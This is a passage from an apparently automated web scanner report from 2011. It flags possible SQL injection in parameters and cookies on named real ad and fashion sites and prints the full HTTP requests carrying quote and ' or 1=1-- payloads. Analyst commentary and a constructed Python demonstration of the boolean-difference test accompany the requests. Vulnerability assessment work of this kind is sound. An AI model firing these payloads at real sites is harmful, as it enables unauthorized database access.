p {font-family:"Verdana";fon
...[SNIP]...

Request 2

GET /adServer/GetInvite2.aspx?esi=true&bannerID=178074&referer=fashion.glam.com''&adexpansion=0&siteID=glamcom&placementID=1248525&click=0&creativeID=1467968 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://fashion.glam.com/2011/04/18/my-spring-shopping-decisions/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=32d59d941303349174; IXAIBannerCounter178074=1; IXAIFirstHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAILastHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAICampaignCounter2648=1; IXAIBanners2648=178074

Response 2

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Content-Length: 19842
Date: Thu, 21 Apr 2011 01:57:15 GMT
Connection: close
Cache-Control: no-store

var InsightExpress={};InsightExpress.LogText='';InsightExpress.Log=function(s,s2){if(!InsightExpress.LogText)InsightExpress.LogText='';InsightExpress.LogText+=s+(s2?' = '+s2:'')+'\n'};InsightExpress.D
...[SNIP]...

1.17. http://core.insightexpressai.com/adServer/GetInvite2.aspx [siteID parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://core.insightexpressai.com
Path:   /adServer/GetInvite2.aspx

Issue detail

The siteID parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the siteID parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /adServer/GetInvite2.aspx?esi=true&bannerID=178074&referer=fashion.glam.com&adexpansion=0&siteID=glamcom'&placementID=1248525&click=0&creativeID=1467968 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://fashion.glam.com/2011/04/18/my-spring-shopping-decisions/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=32d59d941303349174; IXAIBannerCounter178074=1; IXAIFirstHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAILastHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAICampaignCounter2648=1; IXAIBanners2648=178074

Response 1

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Content-Length: 3034
Vary: Accept-Encoding
Date: Thu, 21 Apr 2011 01:57:22 GMT
Connection: close
Cache-Control: no-store

<html>
<head>
<title>Runtime Error</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";fon
...[SNIP]...

Request 2

GET /adServer/GetInvite2.aspx?esi=true&bannerID=178074&referer=fashion.glam.com&adexpansion=0&siteID=glamcom''&placementID=1248525&click=0&creativeID=1467968 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://fashion.glam.com/2011/04/18/my-spring-shopping-decisions/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=32d59d941303349174; IXAIBannerCounter178074=1; IXAIFirstHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAILastHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAICampaignCounter2648=1; IXAIBanners2648=178074

Response 2

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Content-Length: 19840
Date: Thu, 21 Apr 2011 01:57:22 GMT
Connection: close
Cache-Control: no-store

var InsightExpress={};InsightExpress.LogText='';InsightExpress.Log=function(s,s2){if(!InsightExpress.LogText)InsightExpress.LogText='';InsightExpress.LogText+=s+(s2?' = '+s2:'')+'\n'};InsightExpress.D
...[SNIP]...

1.18. http://ds.addthis.com/red/psi/sites/www.manta.com/p.json [di cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.manta.com/p.json

Issue detail

The di cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the di cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. In this instance the evidence is thin: both responses are 500 Internal Server Error with the same 157-byte error page, and the only difference between them is that Response 1 carries a Set-Cookie header rewriting di with the 1=1 payload still embedded (and a new timestamp segment appended), while Response 2 sets no di cookie at all. That is a difference in cookie handling, not in query results, so treat this entry as a probable false positive for SQL injection; the unfiltered reflection of the cookie value into Set-Cookie is still worth noting.

Request 1

GET /red/psi/sites/www.manta.com/p.json HTTP/1.1
Host: ds.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: uid=4d5af32c71c2e1a5; dt=X; psc=4; di=%7B%222%22%3A%223375925924%2CrcHW801b0RcADNFE%22%7D..1298679570.60|1297806627.66'%20and%201%3d1--%20; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; bt=;

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Length: 157
Content-Type: text/html
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sat, 26 Feb 2011 01:59:51 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Mon, 28 Mar 2011 01:59:51 GMT; Path=/
Set-Cookie: di=%7B%222%22%3A%223375925924%2CrcHW801b0RcADNFE%22%7D..1298679570.60|1297806627.66'%20and%201%3d1--%20|1298685591.66; Domain=.addthis.com; Expires=Sun, 24-Feb-2013 18:22:57 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sat, 26 Feb 2011 01:59:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 26 Feb 2011 01:59:51 GMT
Connection: close

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (500 Internal Server Error) has occured in response to this request.
</BODY>
</HTML>

Request 2

GET /red/psi/sites/www.manta.com/p.json HTTP/1.1
Host: ds.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: uid=4d5af32c71c2e1a5; dt=X; psc=4; di=%7B%222%22%3A%223375925924%2CrcHW801b0RcADNFE%22%7D..1298679570.60|1297806627.66'%20and%201%3d2--%20; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; bt=;

Response 2

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Length: 157
Content-Type: text/html
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sat, 26 Feb 2011 01:59:51 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Mon, 28 Mar 2011 01:59:51 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sat, 26 Feb 2011 01:59:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 26 Feb 2011 01:59:52 GMT
Connection: close

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (500 Internal Server Error) has occured in response to this request.
</BODY>
</HTML>

1.19. http://entertainment.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php [menu parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://entertainment.glam.com
Path:   /wp-content/plugins/menus-plus/javascriptmenu.php

Issue detail

The menu parameter appears to be vulnerable to SQL injection attacks. The payloads 19539096%20or%201%3d1--%20 and 19539096%20or%201%3d2--%20 were each submitted in the menu parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. Here the two responses differ in a way that fits the payloads: the 1=1 request returned 21013 bytes and renders a full top navigation (with Home listed twice), while the 1=2 request returned 2388 bytes and renders an empty <ul class='topnav'></ul>. That is what an unquoted numeric comparison would produce if "or 1=1" matches every menu row and "or 1=2" matches none, so this finding deserves manual follow-up.

Request 1

GET /wp-content/plugins/menus-plus/javascriptmenu.php?menu=119539096%20or%201%3d1--%20 HTTP/1.1
Host: entertainment.glam.com
Proxy-Connection: keep-alive
Referer: http://entertainment.glam.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1303348792.1303348869.2; __utmc=234602824; bkpix2=1; qcsegs=D,T; PHPSESSID=nk9jpufv0kgf2vr6ilitu6cv36; __utmb=234602824

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
x-channel: menuplus
Last-Modified: Wed, 20 Apr 2011 18:39:30 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript
backend-server: app135
Content-Length: 21013
X-Varnish: 303287164
Expires: Thu, 21 Apr 2011 01:39:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 21 Apr 2011 01:39:32 GMT
Connection: close

var string =" <div id='Nav' class='sprite_v1-default-navBar-bg-img'><ul class='topnav'><li class='cufonClass'><a href='http://www.glam.com' title='' onmouseover='showSubMenu(0)'>Home</a><li class='LineSeperator sprite_v1-seperator'></li><li class='cufonClass'><a href='http://www.glam.com' title='' onmouseover='showSubMenu(0)'>Home</a><li class='LineSeperator sprite_v1-seperator'></li><li class='cufonClass'><a href='http://fashion.glam.com/' title='Fashion' onmouseover='showSubMenu(4)' onmouseout='hideSubMenu();'>Fashion</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://trends.glam.com/' title='Trends' onmouseover='showSubMenu(5)' onmouseout='hideSubMenu();'>Trends</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://runway.glam.com/' title='Runway' onmouseover='showSubMenu(6)' onmouseout='hideSubMenu();'>Runway</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://designers.glam.com/' title='Designers' onmouseover='showSubMenu(7)' onmouseout='hideSubMenu();'>Designers</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://shopping.glam.com/' title='Shopping' onmouseover='showSubMenu(8)' onmouseout='hideSubMenu();'>Shopping</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://beauty.glam.com/' title='Beauty' onmouseover='showSubMenu(9)' onmouseout='hideSubMenu();'>Beauty</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://hair.glam.com/' title='Hair' onmouseover='showSubMenu(10)' onmouseout='hideSubMenu();'>Hair</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://makeup.glam.com/' title='Makeup' onmouseover='showSubMenu(11)' onmouseout='hideSubMenu();'>Makeup</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a 
href='http://skinbody.glam.com/' title='Skin &amp; Body' onmouseover='showSubMenu(12)' onm
...[SNIP]...

Request 2

GET /wp-content/plugins/menus-plus/javascriptmenu.php?menu=119539096%20or%201%3d2--%20 HTTP/1.1
Host: entertainment.glam.com
Proxy-Connection: keep-alive
Referer: http://entertainment.glam.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1303348792.1303348869.2; __utmc=234602824; bkpix2=1; qcsegs=D,T; PHPSESSID=nk9jpufv0kgf2vr6ilitu6cv36; __utmb=234602824

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
x-channel: menuplus
Last-Modified: Thu, 21 Apr 2011 01:39:34 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript
backend-server: app135
Content-Length: 2388
X-Varnish: 303287227
Expires: Thu, 21 Apr 2011 01:39:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 21 Apr 2011 01:39:34 GMT
Connection: close

var string =" <div id='Nav' class='sprite_v1-default-navBar-bg-img'><ul class='topnav'></ul></div> "; document.write(string);var string ="<div onmouseover='showme();' onmouseout='hideme();' class='SubNav'><div id='submenu_active' ><ul style='width:550px' class='topsubnav' id='glam-menus-plus'><li class=''><a href='http://television.glam.com/' title='Television'>Television</a></li><li class=''><a href='http://music.glam.com/' title='Music'>Music</a></li><li class=''><a href='http://movies.glam.com/' title='Movies'>Movies</a></li><li class=''><a href='http://games.glam.com/' title='Games'>Games</a></li></ul></div><style type='text/css'>._glam_search_button {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: -1070px 0; width: 55px; height: 20px;list-style:none} ._glam_search_twitter {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: -1070px -300px; width: 20px; height: 20px;} ._glam_search_facebook {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: 0 -495px; width: 20px; height: 20px;} ._glam_search_rss {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: 0 -1935px; width: 20px; height: 20px;}</style> <div class='SocialContainer'id='menusearch'><div class='SearchBox'><form role='search' name='searchform' method='get' id='searchform' action='http://www.glam.com' ><div class='search_controls'><input type='text' style='height:15px;' value='' name='search' id='search' /></div><div style='float:left;margin-top:3px;'><span onclick='javascript:document.searchform.submit();' style='cursor:pointer'><div class='_glam_search_button'></div></span></div></div> <ul class='social'> <a href='http://twitter.com/onglamfashion' target='_blank'><div class='_glam_search_twitter'></div></a> <a 
href='http://www.facebook.com/pages/Glamcom/144180538945796?ref=ts' target='_b
...[SNIP]...

1.20. http://fashion.glam.com/2011/04/18/my-spring-shopping-decisions/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://fashion.glam.com
Path:   /2011/04/18/my-spring-shopping-decisions/

Issue detail

The scanner flagged REST URL parameter 1 as appearing vulnerable to SQL injection because a single quote submitted in that path segment produced what it classified as a general error message, and two single quotes did not. The captured evidence does not bear this out: neither response is an error page. Response 1 (obtained after following a redirect) and Response 2 are both 200 OK, served from different cache layers (a Varnish hit with X-Cache-Hits: 302 versus a WP Super Cache file) at 27354 and 27386 bytes respectively, which is more consistent with WordPress URL rewriting than with a SQL error. Treat this entry as unconfirmed, and review the application's handling of other input before spending time on it.

Request 1

GET /2011'/04/18/my-spring-shopping-decisions/ HTTP/1.1
Host: fashion.glam.com
Proxy-Connection: keep-alive
Referer: http://www.glam.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1303348792.1303348869.2; __utmc=234602824; bkpix2=1; qcsegs=D,T; __utmb=234602824

Response 1 (redirected)

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.glam.com/xmlrpc.php
Link: <http://www.glam.com/?p=110683>; rel=shortlink
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
backend-server: app135
Content-Length: 27354
X-Varnish: 303295436 303264075
X-Cache-Hits: 302
Expires: Thu, 21 Apr 2011 01:48:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 21 Apr 2011 01:48:40 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<script type="text/javascript"> var al_timeout = 0; var al_redirectOnLogin = ''; var al_base_uri = 'http://fashion.glam.com/'; var al_success = '1'; var al_failure = '0';</script>
...[SNIP]...

Request 2

GET /2011''/04/18/my-spring-shopping-decisions/ HTTP/1.1
Host: fashion.glam.com
Proxy-Connection: keep-alive
Referer: http://www.glam.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1303348792.1303348869.2; __utmc=234602824; bkpix2=1; qcsegs=D,T; __utmb=234602824

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
x-content-type: article
x-channel: Fashion
Vary: Accept-Encoding
WP-Cache: Served supercache file from PHP
Content-Type: text/html; charset=UTF-8
backend-server: app135
Content-Length: 27386
X-Varnish: 303295444
Expires: Thu, 21 Apr 2011 01:48:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 21 Apr 2011 01:48:40 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...

1.21. http://fashion.glam.com/2011/04/18/my-spring-shopping-decisions/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://fashion.glam.com
Path:   /2011/04/18/my-spring-shopping-decisions/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 80888026'%20or%201%3d1--%20 and 80888026'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
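The boolean difference test used in 1.18, 1.19 and 1.21, reproduced locally as an added example that is not part of the report or of the scanned sites. Everything here is constructed: the menu table, the two hypothetical vulnerable handlers (one with the id compared unquoted, as the 1.19 payload assumes, and one with the value inside a quoted literal, as the quote-prefixed 1.21 payload assumes), a hardened handler, and a hardened handler that adds a per-response nonce to show how the naive version of the test goes wrong and what the confirmation step looks like.

```python
import itertools
import sqlite3

# Constructed sample data, not taken from the report: a small menu table
# standing in for whatever backs javascriptmenu.php.
CONN = sqlite3.connect(":memory:")
CONN.execute("CREATE TABLE menus (id INTEGER, label TEXT)")
CONN.executemany("INSERT INTO menus VALUES (?, ?)",
                 [(1, "Home"), (2, "Fashion"), (3, "Beauty")])

def _ul(rows):
    return "<ul class='topnav'>" + "".join(f"<li>{r[0]}</li>" for r in rows) + "</ul>"

def menu_by_id_concat(menu):
    """Hypothetical vulnerable handler, numeric context: ?menu=1<payload> lands
    unquoted in the WHERE clause, so the payload needs no leading quote."""
    sql = "SELECT label FROM menus WHERE id = " + menu
    return _ul(CONN.execute(sql).fetchall())

def menu_by_label_concat(label):
    """Hypothetical vulnerable handler, string context: the value sits inside
    quotes, so the payload must open with a quote to break out of the literal."""
    sql = "SELECT label FROM menus WHERE label = '" + label + "'"
    return _ul(CONN.execute(sql).fetchall())

def menu_by_id_param(menu):
    """Hardened handler: type check first, then a bound parameter."""
    if not menu.isdigit():
        return _ul([])
    sql = "SELECT label FROM menus WHERE id = ?"
    return _ul(CONN.execute(sql, (int(menu),)).fetchall())

_counter = itertools.count()

def menu_by_id_param_noisy(menu):
    """Hardened handler whose output carries a per-response nonce. It is not
    injectable, but any naive diff of two responses will call them different."""
    return menu_by_id_param(menu) + f"<!-- req {next(_counter)} -->"

TRUE_TAIL, FALSE_TAIL = " or 1=1-- ", " or 1=2-- "

def fetch(handler, value):
    """The scanner's view of one request: the body, or an error marker."""
    try:
        return handler(value)
    except sqlite3.Error as e:
        return "ERROR: " + str(e)

def naive_differential(handler, base):
    """One TRUE request, one FALSE request, flag if the bodies differ. This is
    the test the report describes, and it is where the false positives come from."""
    return fetch(handler, base + TRUE_TAIL) != fetch(handler, base + FALSE_TAIL)

def stable_differential(handler, base):
    """Confirmation step: repeat each side and require the two TRUE responses to
    agree, the two FALSE responses to agree, and the sides to differ. Volatile
    content (nonces, timestamps, rotating ads) fails the first two checks."""
    t1, f1 = fetch(handler, base + TRUE_TAIL), fetch(handler, base + FALSE_TAIL)
    t2, f2 = fetch(handler, base + TRUE_TAIL), fetch(handler, base + FALSE_TAIL)
    return t1 == t2 and f1 == f2 and t1 != f1

if __name__ == "__main__":
    for name, handler, base in [("id-concat", menu_by_id_concat, "119539096"),
                                ("label-concat", menu_by_label_concat, "180888026'"),
                                ("param", menu_by_id_param, "119539096"),
                                ("param-noisy", menu_by_id_param_noisy, "119539096")]:
        print(name, naive_differential(handler, base), stable_differential(handler, base))
```

Against the concatenating handlers the TRUE payload returns every row and the FALSE payload returns an empty list, the same shape of difference the 1.19 responses show. The nonce handler is flagged by the naive comparison and cleared by the repeated one, which is the manual review step the report's caveat is asking for; on a live target the equivalent is to resend each payload a few times and confirm the responses are stable before believing the difference.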

Request 1

GET /2011/04/18/my-spring-shopping-decisions/?180888026'%20or%201%3d1--%20=1 HTTP/1.1
Host: fashion.glam.com
Proxy-Connection: keep-alive
Referer: http://fashion.glam.com/2011/04/18/my-spring-shopping-decisions/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AICookieTest=54; __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1303348792.1303348869.2; __utmc=234602824; bkpix2=1; qcsegs=D,T; __utmb=234602824; PHPSESSID=192lsjebnudjoos0vegf2hpcu4

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
x-content-type: article
x-channel: Fashion
Vary: Accept-Encoding
X-Pingback: http://www.glam.com/xmlrpc.php
Link: <http://www.glam.com/?p=110683>; rel=shortlink
Content-Type: text/html; charset=UTF-8
backend-server: app135
Content-Length: 27477
X-Varnish: 303305584
Expires: Thu, 21 Apr 2011 01:59:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 21 Apr 2011 01:59:29 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<script type="text/javascript" src="http://glamnewlive.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+f2037123a7df95199ace556d58142686418efeed+1303351169"></script> <!-- Netica Monitoring --><!-- DBOK -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
<script type="text/javascript">_uacct = "UA-2024191-1"; _udn="glam.com"; try { urchinTracker(); } catch(err){} </script>
<!-- Start Quantcast tag -->
<script type="text/javascript"> _qoptions={ qacct:"p-874AVp33Bbtkg" };</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>

<!-- End Quantcast tag -->
</head>
<body class="single single-post postid-110683" id="bodyID"><!-- Container START -->
   <noscript><img src="http://pixel.quantserve.com/pixel/p-874AVp33Bbtkg.gif" class="hide" border="0" height="1" width="1" alt="Quantcast"/></noscript>
<div align="center" class="Container"><!-- Page START -->
<div class="topCorner"></div>
<div class="Box">
<table width="100%" cellpadding="0" cellspacing="0" border="0" class="Page">
<tr><td><div class="HorizantalSpacer"></div>
<div class="Header">
<a href="http://www.glam.com" class="Logo sprite_v1-glamcom_206_36"></a>
<div class="LoginLinks" align="right">
                                       <script type="text/javascript" language="javascript"> function setCookieforLogin(c_name,value,expiredays){ if(expiredays){ var exdate=new Date(); exdate.setDate(exdate.getDate()+expiredays); var expires=exdate.toGMTString(); } else var expires=""; document.cookie=c_name+ "=" +escape(value)+((expiredays==null) ? "" : ";expires="+expires)+";domain=.glam.com"; }
                                       function logoutFunction(redirectURL){ setCookieforLogin('logedIncheck','',-1); location.href=redirectURL; }if(!getCookie('logedIncheck')){ document.write('<div onclick="toggleSignIn(\'head\');" id="signInArrowImg"><div id="signInArrowUp">&nbsp;</div><div id="signInArrowDown">&nbsp;</d
...[SNIP]...

Request 2

GET /2011/04/18/my-spring-shopping-decisions/?180888026'%20or%201%3d2--%20=1 HTTP/1.1
Host: fashion.glam.com
Proxy-Connection: keep-alive
Referer: http://fashion.glam.com/2011/04/18/my-spring-shopping-decisions/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AICookieTest=54; __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1303348792.1303348869.2; __utmc=234602824; bkpix2=1; qcsegs=D,T; __utmb=234602824; PHPSESSID=192lsjebnudjoos0vegf2hpcu4

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.glam.com/xmlrpc.php
Link: <http://www.glam.com/?p=110683>; rel=shortlink
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
backend-server: app135
Content-Length: 27354
X-Varnish: 303305626
Expires: Thu, 21 Apr 2011 01:59:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 21 Apr 2011 01:59:31 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
